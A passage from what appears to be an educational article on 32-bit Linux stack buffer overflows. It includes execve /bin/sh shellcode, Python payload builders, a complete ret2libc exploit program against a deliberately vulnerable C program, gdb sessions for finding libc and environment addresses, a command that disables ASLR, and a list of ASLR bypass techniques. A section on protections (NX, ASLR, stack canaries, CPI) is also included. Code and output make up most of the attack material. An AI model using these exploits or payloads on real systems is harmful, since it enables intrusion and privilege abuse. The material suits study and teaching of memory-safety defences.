Error in re-setting breakpoint 1: No source file named /root/TEST_AREA/bufferoverflow/program/ExploitMe.c.
The RET is pointing to the beginning of the ShellCode and we successfully end up in the shell.
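The way the EGG value lines up with the ExploitMe frame can also be checked offline. The following Python 3 sketch rebuilds the value HackYou exports (everything after “EGG=”); the variable names are ours, and the return address is the one from our session, so treat it as an example only:

```python
import struct

# 24-byte shellcode from HackYou.c
shellcode = (
    b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    b"\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)
BUFFER, WORD = 80, 4                      # char buffer[80], 32-bit words
ret = struct.pack("<I", 0xbffff188)       # start of buffer, taken from gdb

# shellcode + NOP padding up to RET, then the address itself
egg_value = shellcode + b"\x90" * 60 + ret

ret_offset = BUFFER + WORD                # skip the buffer and saved EBP
print(len(egg_value), ret_offset)         # 88 84
print(egg_value[ret_offset:] == ret)      # True
```

The 24 + 60 bytes cover the 80-byte buffer plus the saved EBP, so the last four bytes land exactly on RET.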
[Anti] Prevention
The main thing is for developers to write secure code. The OS already has some protections in place:
- NX (Non-Executable Memory) / Data Execution Prevention (DEP): the CPU raises a fault (SIGSEGV) if EIP points into memory marked as non-executable.
- ASLR (Address Space Layout Randomization): places the stack and other segments at random addresses. This might not be ideal on 32-bit machines as only 16 bits are available for randomization (brute force is possible). Controlled by /proc/sys/kernel/randomize_va_space.
- Stack Smashing Protection (SSP) using stack cookies / stack canaries: a stack cookie is a randomly chosen value (4 / 8 bytes) placed before EBP. On return, the function checks the cookie and, if it has been modified, the program simply crashes (gcc’s -fstack-protector-all creates canaries for all functions; safe but somewhat slow).
- Code Pointer Integrity (CPI): guarantees the integrity of all code pointers in a program, preventing control-flow hijacking. The idea is to split memory into a safe region (hardware-protected, storing the pointers) and a regular region. The safe region can only be accessed via “safe” operations (checked at compile time/runtime). (Strong, precise)
- Control Flow Integrity (CFI): (Medium, some overhead, “old”)
- Code Pointer Separation (CPS): a CPI variant more appropriate for code with a large number of virtual function pointers. Here, all code pointers are placed in the safe region, but the pointers used to access them are left in the regular region. (Strong)
Full memory safety is strong and precise but imposes a huge overhead (the program/process slows down by 100% or more). Additionally, we’re going to share the CookieCrumbler details from “Smashing the stack protector for fun and profit”:
Legend:
- LOC: a variable residing on the stack of the function
- TLS: a variable residing in Thread Local Storage (TLS)
- GLO: a global variable residing in statically allocated memory
- DYN: a variable residing in dynamically allocated memory
- main: main thread
- sub: sub thread
- ✘ (red) – Vulnerable implementation: a long buffer overflow on the stack allows for a complete stack canary bypass
- ✘ (orange) – Weak implementation: the reference value is located next to this memory class, which potentially allows an attacker to bypass the protection
- ✔ – Secure implementation: the reference value can’t be overwritten from this memory class
Thread Control Block (TCB)
Operating systems keep a data structure, the Thread Control Block (TCB), for every executing thread. The Windows variant is the Thread Information Block (TIB), which contains info on the thread’s Structured Exception Handling (SEH) chain, the associated Process Control Block (PCB) and a pointer to Thread Local Storage (TLS). Access to the TCB varies: via a library function or via a register. Glibc (Linux x86_64) uses the fs register as the base address of the TCB; on x86_64 the fs and gs segment bases are set through Model Specific Registers (MSRs).
CPI and SSP both need to store their random reference values, and the TCB is used for that purpose.
Non-Executable Stack (NX)
To circumvent this we can rely on Return Oriented Programming (ROP), or more particularly on the return-to-libc technique: we overflow the buffer, but instead of placing a ShellCode on the stack, we point RET to the system() function in libc, which spawns the shell. No code is executed on the stack. We also place the address of exit() in the next slot, where system() expects its own return address, and put a pointer to the “/bin/bash” string right after it as the argument. If we take ExploitMe.c as a reference:
HIGH
      |----------------| ------------ f1 start
      |      PTR3      |  4 bytes => /bin/bash
      |----------------|
      |      PTR2      |  4 bytes => Exit()
      |----------------|
      |      PTR1      |  4 bytes => System() // OVERWRITTEN RET
      |----------------|
      |      EBP       |  4 bytes
      |----------------|
      |     buffer     | 80 bytes => buffer
      |                |
      |                |
      |                |
      |----------------| ------------ f1 end
LOW
So, we’re basically creating the “stack” frame for system() call where we have “parameter(s)” at the top, then RET -> Exit(), followed by the [in theory, non-existent in this case] EBP, local vars, etc.
Here is the ret2lib.c exploit (Security Tube example):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char systemAddr[] = "\x60\xe5\xea\xb7";
char exitAddr[] = "\x50\x3b\xea\xb7";
char bashAddr[] = "\x50\xfd\xff\xbf";

int main()
{
    char buffer[104];

    memset(buffer, 0x90, 104);
    memcpy(buffer, "BUF=", 4);
    memcpy(buffer+88, systemAddr, 4);  // OVERWRITING RET WITH SYSTEM()
    memcpy(buffer+92, exitAddr, 4);    // Exit()
    memcpy(buffer+96, bashAddr, 4);    // shell string
    memcpy(buffer+100, "\x00\x00\x00\x00", 4);
    putenv(buffer);
    system("/bin/bash");
    return 1;
}
The ExploitMe is the target:
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[80];
    getchar(); //TMP, find the addresses
    strcpy(buffer, argv[1]);
    return 1;
}
$ gcc -ggdb -fno-pic -mpreferred-stack-boundary=2 -o ExploitMe ExploitMe.c
$ gdb ExploitMe
(gdb) break main
Breakpoint 1 at 0x119f: file ExploitMe.c, line 8.
(gdb) run test
Starting program: /unknown/TEST_AREA/bufferoverflow/ExploitMe test

Breakpoint 1, main (argc=2, argv=0xbffff374) at ExploitMe.c:8
8 strcpy(buffer, argv[1]);
(gdb) p system
$1 = {int (const char *)} 0xb7e1e6e0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0xb7e117a0 <__GI_exit>
The “-fno-pic” flag seems to be vital in this example: without it nothing happens in the end, or you end up with a “Segmentation fault”. Before we proceed, let’s introduce another piece of code which is going to find our ENV var addresses, GEVA (Get ENV Variable Address):
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *addr = getenv(argv[1]);
    printf("Addr of %s: %p (%s)\n", argv[1], addr, addr);
    return 0;
}
$ gcc -ggdb -mpreferred-stack-boundary=2 -o GEVA GEVA.c
Running the ret2libc shellcode, finding the “shell” location:
$ gcc -ggdb -mpreferred-stack-boundary=2 -o ret2libc ret2libc.c
$ ./ret2libc
$ ./GEVA BUF
Addr of BUF: 0xbffffde4 (��������������������������������������������������������������������������������������ᷠ�����)
$ export myshell="/bin/sh"
$ ./GEVA myshell
Addr of myshell: 0xbffffed6 (/bin/sh)
$ ./ExploitMe $BUF
>
The getchar() will “pause” the execution, so jump to another terminal, and connect to ExploitMe process via GDB:
$ ps -eaf | grep ExploitMe
root 13268 13265 0 09:32 pts/0 00:00:00 ./ExploitMe ??????????????????????????????????????????????????????????????????????????????????????????????
root 13270 9730 0 09:32 pts/1 00:00:00 grep ExploitMe
$ gdb ExploitMe 13268
Inside, find/verify the “myshell” location with x/1s (hit the enter a number of times):
(gdb) x/1s 0xbffffed6
0xbffffed6: "G_RUNTIME_DIR=/run/user/0"
(gdb)
0xbffffef0: "XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share/:/usr/share/"
...
(gdb)
0xc0000000: <error: Cannot access memory at the address 0xc0000000>
As you can see, it’s nowhere to be found at that address. The environment sits at slightly different stack addresses in each process (the program name and arguments differ), so the value GEVA printed is only an approximation. Let’s check a location just before the one we got (0xbffffec0 < 0xbffffed6):
(gdb) x/1s 0xbffffec0
0xbffffec0: "D=2"
(gdb)
0xbffffec4: "myshell=/bin/sh"
(gdb) x/1s 0xbffffecc
0xbffffecc: "/bin/sh"
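The address of the string itself follows from the address of the whole “name=value” entry: we only need to skip the variable name and the “=” sign. A tiny Python 3 sketch of that arithmetic (the helper name value_address is ours; the entry address is the one gdb showed in our session):

```python
def value_address(entry_addr, name):
    """Address of the value part of a NAME=value environment entry."""
    return entry_addr + len(name) + 1   # +1 skips the '=' character

entry = 0xbffffec4                      # where gdb shows "myshell=/bin/sh"
addr = value_address(entry, "myshell")

print(hex(addr))                        # 0xbffffecc
```

This is the address system() has to receive as its argument.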
Ok, now we have everything, go back and adjust the shellcode (mind the Endian thing):
char systemAddr[] = "\xe0\xe6\xe1\xb7"; // 0xb7e1e6e0
char exitAddr[] = "\xa0\x17\xe1\xb7";   // 0xb7e117a0
char bashAddr[] = "\xcc\xfe\xff\xbf";   // 0xbffffecc
You can remove getchar() from ExploitMe if you wish (or not). If you now re-compile everything and run it:
$ ./ret2lib
$ export myshell="/bin/sh"
$ ./ExploitMe $BUF
#
… and we got the shell (/bin/sh).
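For reference, the fake frame handed to system() can be laid out in a few lines. This is a minimal Python 3 sketch of the BUF value (everything after “BUF=”), using the addresses found in our session; the helper p32 and the constant names are ours, and the addresses will differ on other systems:

```python
import struct

def p32(value):
    """Pack a 32-bit address in little-endian byte order."""
    return struct.pack("<I", value)

SYSTEM = 0xb7e1e6e0   # p system
EXIT = 0xb7e117a0     # p exit
BINSH = 0xbffffecc    # address of the "/bin/sh" string

filler = b"\x90" * 84                 # buffer (80) + saved EBP (4)
frame = p32(SYSTEM) + p32(EXIT) + p32(BINSH)
buf_value = filler + frame

print(len(buf_value))                 # 96
print(frame.hex())                    # e0e6e1b7a017e1b7ccfeffbf
```

The order matters: RET is replaced by system(), the next word is where system() will return to (exit()), and the word after that is its first argument.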
ASLR
As mentioned, ASLR is controlled by the /proc/sys/kernel/randomize_va_space flag. Check the process memory maps:
$ cat /proc/self/maps
...
bfcf0000-bfd11000 rw-p 00000000 00:00 0 [stack]
$ cat /proc/self/maps
...
bfb07000-bfb28000 rw-p 00000000 00:00 0 [stack]
If ASLR is enabled (2), you’ll see randomization, if not, the stack location will be the same/unchanged. To disable it:
$ echo 0 > /proc/sys/kernel/randomize_va_space
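Comparing the stack mappings by eye gets tedious, so here is a small Python 3 sketch that extracts the [stack] range from maps output. The function name stack_range is ours, and the two sample lines are the ones from the listing above:

```python
def stack_range(maps_text):
    """Return (start, end) of the [stack] mapping, or None if absent."""
    for line in maps_text.splitlines():
        if line.rstrip().endswith("[stack]"):
            start, end = line.split()[0].split("-")
            return int(start, 16), int(end, 16)
    return None

run1 = "bfcf0000-bfd11000 rw-p 00000000 00:00 0 [stack]"
run2 = "bfb07000-bfb28000 rw-p 00000000 00:00 0 [stack]"

a, b = stack_range(run1), stack_range(run2)
print(hex(a[0]), hex(b[0]), a[0] != b[0])  # 0xbfcf0000 0xbfb07000 True
print(hex(a[1] - a[0]))                    # 0x21000
```

On a live Linux system the same function can be fed with open("/proc/self/maps").read(). With ASLR disabled, repeated runs should report the same range.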
In general, there are a few ways to bypass ASLR:
- Direct RET overwrite : a process with ASLR might load non-ASLR modules, allowing you to run your ShellCode via a jmp esp found in such a module
- Partial EIP overwrite : overwrite only the low-order byte(s) of RET, so the randomized high bytes stay intact and the jump lands inside the same module
- NOP spray : create a big block of NOPs to increase the chance of the jump landing in the right place, i.e. a NOP Sled (not working if NX/DEP is enabled)
- Bruteforce : trying different addresses until it works (program not crashing)
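To get a feeling for the brute-force numbers, here is a rough Python 3 estimate. It is an idealized model of our own, not a measurement: it assumes every attempt sees a fresh, uniformly random layout with entropy_bits bits of entropy and that exactly one layout makes the exploit work:

```python
def expected_attempts(entropy_bits):
    """Mean number of tries until the guessed layout is hit (idealized)."""
    return 2 ** entropy_bits

def success_probability(entropy_bits, tries):
    """Chance of at least one hit within the given number of tries."""
    p = 1 / 2 ** entropy_bits
    return 1 - (1 - p) ** tries

bits = 16   # the 32-bit figure mentioned in the ASLR entry above
print(expected_attempts(bits))                      # 65536
print(round(success_probability(bits, 65536), 3))   # 0.632
```

A NOP sled or a partial overwrite effectively reduces the number of bits that have to be guessed, which is why these techniques are often combined.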
Conclusion
The general approach is to find the limits, overwrite RET and reach the shellcode. Some functions might be more difficult than others, so pay attention to the details and notes we mentioned.
This is a relatively long and complex article. Hopefully it clarified certain things about buffer overflow attacks (details, terms, approaches, styles, etc.) and showed a lot of things we should continue working on. It’s not always easy to exploit a program, and security measures constantly advance. With all that in mind, we have a long way ahead of us and a lot of ground to cover. We’ll continue adding things and updating this article (techniques, explanations, examples, etc.). Keep up, don’t give up.